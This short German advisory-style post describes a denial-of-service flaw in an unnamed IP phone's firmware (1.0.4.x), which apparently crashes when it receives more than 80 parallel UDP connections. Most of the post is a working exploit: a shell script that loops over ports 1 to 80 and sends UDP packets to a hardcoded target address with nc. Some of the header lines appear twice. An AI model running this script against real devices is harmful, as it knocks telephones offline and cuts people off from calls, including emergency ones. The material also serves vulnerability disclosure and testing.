Wenn die IP des Telefons für Angreifer erreichbar ist, kann dieser das Telefon sehr einfach zum Absturz bringen. Es sieht so aus, als könnte das Telefon nicht mehr als 80 parallele UDP Verbindungen verwalten.
Exploit:
Erfolgreich getestet mit Firmware:
1.0.4.55, 1.0.4.64, 1.0.4.68
Version 1.0.5.0 scheint nicht betroffen zu sein.
Exploit:
Code:
#!/bin/sh
target=192.168.10.9;
i=1;
while [ $i -le 80 ];
do
echo "$i" ;
echo "$i" | nc -u $target $i;
i=`expr $i + 1`;
done;
Erfolgreich getestet mit Firmware:
1.0.4.55, 1.0.4.64, 1.0.4.68
Version 1.0.5.0 scheint nicht betroffen zu sein.